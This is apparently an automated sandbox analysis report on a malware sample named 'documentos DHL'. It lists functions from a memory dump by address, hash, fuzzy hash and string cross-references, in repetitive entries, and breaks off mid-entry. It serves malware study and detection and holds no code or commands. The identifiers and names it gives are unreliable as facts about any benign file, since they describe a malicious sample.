Instruction ID: b5949f6b69b122561f3a8843e8684d03be0fc0418c6bf4545f4a6a2eef0499a9
Opcode Fuzzy Hash: 7214bf2e4c444d46827305cfa87b8376b9678e60d847fbb31431669002351bd0
Instruction Fuzzy Hash: 4051B04AE2F70695E377A034C5E27F21788DF172E1F248B1A8867A2DE17B1E058926C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372B3E Relevance: 5.2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: aa6ee4b2496e9ade9c83b291c8281c5af0da8c61dc3dbe4a3de39a28cba0cbec
Instruction ID: 6cd2cfa1f526e1100d7ef281f7d6856e6e9c9b890fa2ad007bf3c9fb4a27a554
Opcode Fuzzy Hash: aa6ee4b2496e9ade9c83b291c8281c5af0da8c61dc3dbe4a3de39a28cba0cbec
Instruction Fuzzy Hash: 3151D04AE2F70695E377A034C1D27F22789DF072E1F648B5A8867A2DD17F1F058926C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372BA4 Relevance: 5.2, Strings: 4, Instructions: 208COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD
t, xrefs: 03372CCE

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@$t${
API String ID: 0-3944073869
Opcode ID: 97a4c983d515fee572ea57dee70109890455ee74e4cc5fb8498f29e596a41c66
Instruction ID: 2d25fa8a976d9c0f05c3939987a598a3d10cb64173a4dfdaf3195a040104e3b4
Opcode Fuzzy Hash: 97a4c983d515fee572ea57dee70109890455ee74e4cc5fb8498f29e596a41c66
Instruction Fuzzy Hash: 2151D04AE2B70694E377A034C1D27F2278DDF072E1F648B1A8867B2D917B1F058926C4

Uniqueness

Uniqueness Score: -1.00%

Function 0337006F Relevance: 4.4, Strings: 3, Instructions: 658COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 1f55f252958d694868c9b5df233483c67f97c167c31d16e659fda48ffd855491
Instruction ID: 132f50aad6adbc69254e8a222066bda1a02e4700b8283d79adbcdf79f0ead98e
Opcode Fuzzy Hash: 1f55f252958d694868c9b5df233483c67f97c167c31d16e659fda48ffd855491
Instruction Fuzzy Hash: 78F1AB4BF2B30589E7BBE031C2C17B25688CF275E5F51CB9A982671CA1B71F5A8D05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370155 Relevance: 4.4, Strings: 3, Instructions: 639COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 82bbf3aef5585f9231bc769307a136553e678ec2c42c82177dbb189af0f1d4f8
Instruction ID: a17c0a359a0557281c62da25fa396caa398cfb1ab382d6664f3baf96820e1e24
Opcode Fuzzy Hash: 82bbf3aef5585f9231bc769307a136553e678ec2c42c82177dbb189af0f1d4f8
Instruction Fuzzy Hash: 88E1CB47E3F70689E3A7B031C2817A25688CF275D6F62CB5A983772DA5770F4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 033701C7 Relevance: 4.4, Strings: 3, Instructions: 614COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 172f44b9de4dbd8fa6262c001751a0151721b666f6f0438a5a544c024a8a8ad9
Instruction ID: 99818366aee023f60d2f403c9910c30a35e382dfc7f51de210f3d124eb1b70bc
Opcode Fuzzy Hash: 172f44b9de4dbd8fa6262c001751a0151721b666f6f0438a5a544c024a8a8ad9
Instruction Fuzzy Hash: FCE1CB47E3F70689E3A7B031C2817A25688CF275D6F62CB5A983672DA5770F4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370383 Relevance: 4.4, Strings: 3, Instructions: 612COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 868d9dc749a0329226b796ad3fd1e056d05e911e6ed3cf5f22181530f67313a4
Instruction ID: f9de2f7cc69eb9fef942dff105f04c3230ea50ba2381c554572bfe260f3faf2f
Opcode Fuzzy Hash: 868d9dc749a0329226b796ad3fd1e056d05e911e6ed3cf5f22181530f67313a4
Instruction Fuzzy Hash: 83D1A983E3F70689E3B7A031C6817A25688CF275D2F22CB5A583772DA5770F4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370010 Relevance: 4.4, Strings: 3, Instructions: 612COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: df2a58a41153347f835b30cb2b34080600da4a6d44bc64eb0a52817a27ea3547
Instruction ID: 65ccbad7510c2f296da08ab4463b996b943e8a4bc3a048e746bbad2b1ab53699
Opcode Fuzzy Hash: df2a58a41153347f835b30cb2b34080600da4a6d44bc64eb0a52817a27ea3547
Instruction Fuzzy Hash: ABE1CB87E3F71689E3A7B030C6817A25688CF275D6F21CB5A983672DA5770F4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 033700E0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 69830f6c5d5d86877b8cf305358ba343be8e94deb583ff80b97fd745779cb4be
Instruction ID: d5ad0646d21ea6fed11405788c9115ebfb8ed25e1b99796ce48ade646af46ff0
Opcode Fuzzy Hash: 69830f6c5d5d86877b8cf305358ba343be8e94deb583ff80b97fd745779cb4be
Instruction Fuzzy Hash: 78E1CC87E3F71689E3A7B030C2817A25688CF275D6F61CB5A983672DA5770F4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 033703FE Relevance: 4.3, Strings: 3, Instructions: 589COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 899e833a5ad3a6b615ff8ca65f0e7befba1622d0c4f298461e90edd79396a0bc
Instruction ID: 1c0fce29bdf2f1a7b2a81a1b606c5622a93178af64da0650735bb5a19a623c7e
Opcode Fuzzy Hash: 899e833a5ad3a6b615ff8ca65f0e7befba1622d0c4f298461e90edd79396a0bc
Instruction Fuzzy Hash: 7ED1A983E3F70689E3B7A030C6827A25688CF275D2F21CB5A583772DA5770F4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 0337057E Relevance: 4.3, Strings: 3, Instructions: 576COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 1d4ee46f87fc43b842f8e6ba8808e1cea80d1b0177cd6e4273cb6be18c68c031
Instruction ID: 09991a21d0384a4ae09b271c917b7bae2c744e6671b8af3eee6dabf3979a5c6a
Opcode Fuzzy Hash: 1d4ee46f87fc43b842f8e6ba8808e1cea80d1b0177cd6e4273cb6be18c68c031
Instruction Fuzzy Hash: 3FD1AB43E3F70689E3A7A03086817A25688CF275D6F62CB5A5C3772DA5770F4A8E05C8

Uniqueness

Uniqueness Score: -1.00%

Function 03370225 Relevance: 4.3, Strings: 3, Instructions: 570COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: c6ef5c3f7c84f853b310971bdf6c86f303a8097f9a5151c3e15e9cc09b92fbfa
Instruction ID: d53decd5eb70bd8fbebb355a87f8efd8f8f010b33c6defdb6b58332ecc09de10
Opcode Fuzzy Hash: c6ef5c3f7c84f853b310971bdf6c86f303a8097f9a5151c3e15e9cc09b92fbfa
Instruction Fuzzy Hash: EDE1BB43E3F70689E3B7B031C6817A66788DF275D2F11CB5A982772DA5770E4A8E05C8

Uniqueness

Uniqueness Score: -1.00%

Function 033702D9 Relevance: 4.3, Strings: 3, Instructions: 556COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 085e6035bdb219c89f0f3a8445fc378492855be4cee2446dbcf66b664a902f10
Instruction ID: 3ffddc8745027ad6857050caa989556557566102e51b75701cdd788e7e143eb2
Opcode Fuzzy Hash: 085e6035bdb219c89f0f3a8445fc378492855be4cee2446dbcf66b664a902f10
Instruction Fuzzy Hash: A1E1BA43E3F70689E3A7A031C6817A26788CF275D2F22CB5A5C2772DA5770F4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370464 Relevance: 4.3, Strings: 3, Instructions: 548COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 817093c31c2ca7871b125180d236a73948012d46cfe06a023ecef6fdee8c520b
Instruction ID: e02047466dfd5d20cdfcefc774b2734189a2fc2c4cd3104f697527d11a222934
Opcode Fuzzy Hash: 817093c31c2ca7871b125180d236a73948012d46cfe06a023ecef6fdee8c520b
Instruction Fuzzy Hash: 00D1AB83E3F70689E3A7A030C6817A25688CF275D6F61CB5A5C3772DA5770F4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 033704DF Relevance: 4.3, Strings: 3, Instructions: 547COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 23b6a2a9f509536cd636ed89f541478acc13a656664e9041d16e785b52975727
Instruction ID: 83e515926ec93962976097ad2912bd85ef937efa017c3f91e965cb0892ad2765
Opcode Fuzzy Hash: 23b6a2a9f509536cd636ed89f541478acc13a656664e9041d16e785b52975727
Instruction Fuzzy Hash: 80D1BB83E3F70688E3A7A030C6817A26788CF275D2F21CB5A5C3672DA5771F4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 0337029B Relevance: 4.3, Strings: 3, Instructions: 540COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 14037890af0ab00a6c25910ff29ea23b938303628c4852cf074610dae7a790a7
Instruction ID: 6906c1ca73aec3805136aca82b28ec41bbc4266bdaed9236e64c814d256f32b7
Opcode Fuzzy Hash: 14037890af0ab00a6c25910ff29ea23b938303628c4852cf074610dae7a790a7
Instruction Fuzzy Hash: 6AE1CB43E3F70689E3A7B030C6817A26788DF275D6F21CB5A582772DA5770F4A8E05C8

Uniqueness

Uniqueness Score: -1.00%

Function 03370601 Relevance: 4.3, Strings: 3, Instructions: 502COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: b746ba535a6c4f16e9a549a1a2366d3ea7420d8694236c973b5a58aaeb33fa1a
Instruction ID: 66f4ff97f4f71c29962398f9dd2c26dfd8e6f9c272800d8b23a2b40d946e0c47
Opcode Fuzzy Hash: b746ba535a6c4f16e9a549a1a2366d3ea7420d8694236c973b5a58aaeb33fa1a
Instruction Fuzzy Hash: 2DC1BB43E3F70689E3A7B031C6817A25288CF275D2F22CB5A5C3772DA5771E4A8E05C8

Uniqueness

Uniqueness Score: -1.00%

Function 033706ED Relevance: 4.2, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: c39be97b87c454676613d915306eeb764f20f680adee5d3ab9fdc1d55e5e21a4
Instruction ID: 7dd754475606f8621fb803d617c3af82fbff5b7598a192421bb2a9f970547a2b
Opcode Fuzzy Hash: c39be97b87c454676613d915306eeb764f20f680adee5d3ab9fdc1d55e5e21a4
Instruction Fuzzy Hash: E3C1BB43E3F70689E3A7B03086817A26788CF275D2F65CB5A5C3772CA5770E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 0337055D Relevance: 4.2, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 966ca98bfbd879cbf575ca26b719240488419c481c212a18f81332137677f7f8
Instruction ID: 4edaedee14e940ad996315dbc7bcae31fedbce6dca2f0ca90cd1d64807079211
Opcode Fuzzy Hash: 966ca98bfbd879cbf575ca26b719240488419c481c212a18f81332137677f7f8
Instruction Fuzzy Hash: BFD1AB43E3F70689E3A7A030C6817A25688CF275D6F62CB5A5C3772DA5771F4A8E05C8

Uniqueness

Uniqueness Score: -1.00%

Function 03370799 Relevance: 4.2, Strings: 3, Instructions: 475COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 1cbaeb0873c6f2a0049e59d9b4d50f25547d89fc64e072201e37673324ee8bda
Instruction ID: c8e2f1faf79d8160dcf9260e805fb1581437b60aeae96c18d39423362734d395
Opcode Fuzzy Hash: 1cbaeb0873c6f2a0049e59d9b4d50f25547d89fc64e072201e37673324ee8bda
Instruction Fuzzy Hash: DAB1CC87E3F70688E7A7B03186817A25388CF275D2F61CB565C3772CA5770E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 0337082F Relevance: 4.2, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 4600c380331958758642cd3d24000399dfc38a8ce1f956ff6f6938b84b328247
Instruction ID: aa9f62387a0744150936d07dd1f5bf7fcf72aeb043b9af223bea0f796ed1dfcf
Opcode Fuzzy Hash: 4600c380331958758642cd3d24000399dfc38a8ce1f956ff6f6938b84b328247
Instruction Fuzzy Hash: 26B1BB47E3F70689E7A3B03186813A25788CF275D2F61CB5A5C3B72DA5770E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 033708A3 Relevance: 4.2, Strings: 3, Instructions: 462COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 1bdf05f0da9387e0dcb5bab0591c5fd8c9dd47da3ad1b86668b1f48b7a38201e
Instruction ID: 8063690678ef86614b477d65e31cf2bf8c52172df8589d085d4974b9e2fdc6f3
Opcode Fuzzy Hash: 1bdf05f0da9387e0dcb5bab0591c5fd8c9dd47da3ad1b86668b1f48b7a38201e
Instruction Fuzzy Hash: 47B1BB47E3F70688E7A3B03186813A25788CF275D2F66CB5A5C3772CA5770E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 033706A6 Relevance: 4.2, Strings: 3, Instructions: 459COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 22432059fd96acbf4a7f933e21d9e0276ad55b607ac3b7b4cf3ad83758be3f33
Instruction ID: 89bc6c2655b90b6be5c0da776ea327bccc57d7ef9335c5f0f2f0deb2878a93f3
Opcode Fuzzy Hash: 22432059fd96acbf4a7f933e21d9e0276ad55b607ac3b7b4cf3ad83758be3f33
Instruction Fuzzy Hash: D4C1BC47E3F70689E3A7B03086817A26388CF275D6F51CB5A9C3772CA5B71E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370B42 Relevance: 4.2, Strings: 3, Instructions: 458COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 419012c5eb982c21056d5b8672afe884776fb5f40702128fe7fbdce49f0b8086
Instruction ID: 4e2f69af096435b8ed563479671b7e2b86be6f2a84bfe9b5257162b17caa20ea
Opcode Fuzzy Hash: 419012c5eb982c21056d5b8672afe884776fb5f40702128fe7fbdce49f0b8086
Instruction Fuzzy Hash: BFA1AB87E3F70689E7B3A03186823A25788CF275D2F55CB5A5C2772DA5B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370925 Relevance: 4.2, Strings: 3, Instructions: 456COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 5f6a6318360cb161b5dfb895dc0d79269d6255dfb5d546c42acbc28adbabc283
Instruction ID: 1e1ffe4f7b94c093814cca25db059723d926750c58fe19af549956a5ba2f498d
Opcode Fuzzy Hash: 5f6a6318360cb161b5dfb895dc0d79269d6255dfb5d546c42acbc28adbabc283
Instruction Fuzzy Hash: 31B18A47E3F70689E7A7A03186817A25788CF275D2F51CB5A5C3672CA5770E4A8E05C8

Uniqueness

Uniqueness Score: -1.00%

Function 033707DB Relevance: 4.2, Strings: 3, Instructions: 446COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 5244e90f1baffe5649623fc76067c1ce457c9051ca0ea4fb4c3fe2f148dadecd
Instruction ID: 33f735c7f686a2f35bd0f65faafdbd25230be844f3b6541e435ea2d49739f563
Opcode Fuzzy Hash: 5244e90f1baffe5649623fc76067c1ce457c9051ca0ea4fb4c3fe2f148dadecd
Instruction Fuzzy Hash: E3B1CC43E3F70689E7A7B03186813A26788CF275D2F61CB4A5C3772CA5770E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370750 Relevance: 4.2, Strings: 3, Instructions: 443COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: cbe3b5e9ee2cedc11d1ffb00ad8e0350f446f8c5a7c25c5eb35907bbedf1554c
Instruction ID: 886dc36e70175db67277df37b6177f2677b9704a105147a75998ec6bcef31874
Opcode Fuzzy Hash: cbe3b5e9ee2cedc11d1ffb00ad8e0350f446f8c5a7c25c5eb35907bbedf1554c
Instruction Fuzzy Hash: A3C1BC47E3F70688E7A7B03086817A25388CF275D2F65CB5A5C3772CA5770E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370BB9 Relevance: 4.2, Strings: 3, Instructions: 436COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 889e882c17be8eb02d831ebeacfd9c6c4acfe8680115b2005fec5046899324d5
Instruction ID: 9c9a2870c3ecb998c632befaf8bade4e48786e713f1ce727d864d1e8cc1ceac5
Opcode Fuzzy Hash: 889e882c17be8eb02d831ebeacfd9c6c4acfe8680115b2005fec5046899324d5
Instruction Fuzzy Hash: FCA1CC87E3F70689E7B3B03086823A25788CF275D2F55CB5A5C2772DA5B70E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370C63 Relevance: 4.2, Strings: 3, Instructions: 435COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 16cafd628d7a68236043ef5727b74ac2e96e18e05d94a44bf32549242484977e
Instruction ID: 380e7de2205f59b2bc0856bf3b819ecec28c7b8c41ffb41b35026732281392e8
Opcode Fuzzy Hash: 16cafd628d7a68236043ef5727b74ac2e96e18e05d94a44bf32549242484977e
Instruction Fuzzy Hash: 9191AC47E3F71689E7B3A03185827A25388CF275D1F65CB5B5C2672CA5BB0E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 033709AA Relevance: 4.2, Strings: 3, Instructions: 433COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 4cd960dd243b1f56fbd073886cc7f80f82fc5d01f0984f03ba73c1d6d7ffda69
Instruction ID: 9ca13bfb258690a2649b880ed62c8ea375bc10028d0e653206e6ea12f2d77597
Opcode Fuzzy Hash: 4cd960dd243b1f56fbd073886cc7f80f82fc5d01f0984f03ba73c1d6d7ffda69
Instruction Fuzzy Hash: F7B1AC47E3F70689E7B7A03186813A25788CF275D2F55CB5A5C3772CA5770E4A8E05C4

Uniqueness

Uniqueness Score: -1.00%

Function 03370A0D Relevance: 4.2, Strings: 3, Instructions: 416COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 69db1c949e36dc337853c5241e59d75d7cb74ec45522060486e8343f7fe7fefe
Instruction ID: cd8d5acf2ad0240600ac325aede1d4a4e4a59210037190fe89f18822f9cb4518
Opcode Fuzzy Hash: 69db1c949e36dc337853c5241e59d75d7cb74ec45522060486e8343f7fe7fefe
Instruction Fuzzy Hash: B5A19A87E3F70689E7B7A03186813A25788CF275D2F65CB5A5C3772CA5770E4A8E05C8

Uniqueness

Uniqueness Score: -1.00%

Function 03370E08 Relevance: 4.2, Strings: 3, Instructions: 404COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

